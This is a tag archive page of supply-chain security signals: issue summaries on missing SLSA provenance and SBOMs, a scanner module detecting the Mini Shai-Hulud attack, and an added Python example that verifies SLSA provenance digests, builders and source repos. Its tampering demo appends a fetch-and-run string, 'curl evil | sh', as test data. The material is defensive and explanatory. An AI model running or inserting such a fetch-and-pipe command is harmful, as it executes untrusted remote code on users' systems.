WhisperX tag archive

#SLSA

This page collects WhisperX intelligence signals tagged #SLSA. It is designed for humans, search engines, and AI agents: each item links to a canonical source-backed record with sector, source, timestamp, credibility, and exportable structured data.

Latest Signals (3)

The Lab · 2026-04-14 10:22:41 · GitHub Issues

1. docker-hash CLI's Supply Chain Exposed: No Provenance, No Detection for Tampered Releases

The `docker-hash` tool, used as a dependency in many CI/CD pipelines, currently ships its release artifacts with no verifiable supply-chain assurances. Because it is consumed as a CLI, a Docker image, and a GitHub Action, a compromise of its build process would propagate directly to every downstream consumer. There is no SLSA attestation, no SBOM, ...

The Lab · 2026-04-15 21:22:53 · GitHub Issues

2. Dagger CI/CD Pipeline Exposes Critical Supply Chain Gaps: Missing Image Signing, SBOM, SLSA Provenance

A review of the existing Dagger CI/CD pipeline reveals multiple unaddressed supply-chain integrity risks that leave the software delivery process open to undetected compromise. The current workflow performs vulnerability scans but lacks the fundamental cryptographic and attestation safeguards (image signing, SBOM, SLSA provenance). This cr...
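Both of the signals above describe the same gap from the consumer's side: a release with no SLSA provenance gives a downstream pipeline nothing to check a downloaded artifact against. When provenance is present, the check has two halves: verify the DSSE envelope's signature (cosign or slsa-verifier do this), then apply policy to the decoded in-toto Statement. The block below is an added example, not WhisperX's code and not anything from the docker-hash or Dagger projects; it shows only the policy half and assumes the signature has already been verified. The artifact bytes, artifact name, builder ID, repository URL and the statement itself are constructed for illustration.

```python
"""Policy check on a decoded SLSA v1 provenance statement (added example).

Assumes the DSSE signature over the statement has already been verified;
this code only enforces what the statement says about the artifact.
"""
import hashlib
import hmac

IN_TOTO_STATEMENT_V1 = "https://in-toto.io/Statement/v1"
SLSA_PROVENANCE_V1 = "https://slsa.dev/provenance/v1"

# Constructed sample artifact standing in for a downloaded release binary.
ARTIFACT_BYTES = b"#!/bin/sh\necho 'docker-hash example release'\n"
ARTIFACT_NAME = "docker-hash-linux-amd64"

# Hypothetical policy: the builder identities and source repository we accept.
# A real policy pins the exact builder IDs your organisation trusts.
TRUSTED_BUILDER_ID = ("https://github.com/slsa-framework/slsa-github-generator"
                      "/.github/workflows/generator_generic_slsa3.yml@refs/tags/v2.0.0")
TRUSTED_BUILDERS = {TRUSTED_BUILDER_ID}
EXPECTED_REPO = "https://github.com/example-org/docker-hash"  # assumed, not real

# Constructed in-toto Statement carrying a SLSA v1 predicate, as it looks
# after the DSSE payload has been base64-decoded and JSON-parsed.
SAMPLE_STATEMENT = {
    "_type": IN_TOTO_STATEMENT_V1,
    "subject": [
        {"name": ARTIFACT_NAME,
         "digest": {"sha256": hashlib.sha256(ARTIFACT_BYTES).hexdigest()}},
    ],
    "predicateType": SLSA_PROVENANCE_V1,
    "predicate": {
        "buildDefinition": {
            "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
            "externalParameters": {
                "workflow": {"ref": "refs/tags/v1.2.3",
                             "repository": EXPECTED_REPO,
                             "path": ".github/workflows/release.yml"},
            },
        },
        "runDetails": {"builder": {"id": TRUSTED_BUILDER_ID}},
    },
}


def verify_provenance(statement, artifact, artifact_name, trusted_builders, expected_repo):
    """Return a list of policy failures; an empty list means the artifact passes."""
    failures = []
    if statement.get("_type") != IN_TOTO_STATEMENT_V1:
        failures.append("statement-type")
    if statement.get("predicateType") != SLSA_PROVENANCE_V1:
        failures.append("predicate-type")

    # The subject digest binds the provenance to exactly these artifact bytes;
    # a tampered download fails here even if the statement itself is genuine.
    actual = hashlib.sha256(artifact).hexdigest()
    subjects = [s for s in statement.get("subject", []) if s.get("name") == artifact_name]
    if not subjects:
        failures.append("subject-missing")
    else:
        claimed = subjects[0].get("digest", {}).get("sha256", "")
        if not hmac.compare_digest(claimed, actual):
            failures.append("subject-digest-mismatch")

    predicate = statement.get("predicate", {})
    # Builder identity: provenance from an unknown builder is worthless even
    # if it is well-formed and correctly signed.
    builder_id = predicate.get("runDetails", {}).get("builder", {}).get("id")
    if builder_id not in trusted_builders:
        failures.append("untrusted-builder")

    # Source repository: stops a valid builder from vouching for a fork.
    repo = (predicate.get("buildDefinition", {}).get("externalParameters", {})
            .get("workflow", {}).get("repository"))
    if repo != expected_repo:
        failures.append("unexpected-source-repo")
    return failures


def demo():
    """Run the check on the genuine sample and on a tampered copy of it."""
    good = verify_provenance(SAMPLE_STATEMENT, ARTIFACT_BYTES, ARTIFACT_NAME,
                             TRUSTED_BUILDERS, EXPECTED_REPO)
    tampered = verify_provenance(SAMPLE_STATEMENT, ARTIFACT_BYTES + b"curl evil | sh\n",
                                 ARTIFACT_NAME, TRUSTED_BUILDERS, EXPECTED_REPO)
    return good, tampered


if __name__ == "__main__":
    good, tampered = demo()
    print("genuine artifact:", good or "OK")
    print("tampered artifact:", tampered)
```

The subject-digest check is the one a missing attestation makes impossible: without provenance, a tampered `docker-hash` binary or image is indistinguishable from a genuine one at download time, which is exactly the "no detection for tampered releases" condition in the first signal.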

The Lab · 2026-05-13 17:48:20 · GitHub Issues

3. Sentinel Tool Adds Detection for Mini Shai-Hulud Supply Chain Attack Targeting TanStack, SAP, UiPath Packages (CVE-2026-45321)

A new security module targeting the Mini Shai-Hulud supply chain attack family has been merged into Sentinel, the open-source security scanner. The module, labeled `shai-hulud`, detects all four documented attack waves spanning September 2025 through May 2026, including the recently disclosed compromise of 42 `@tanstac...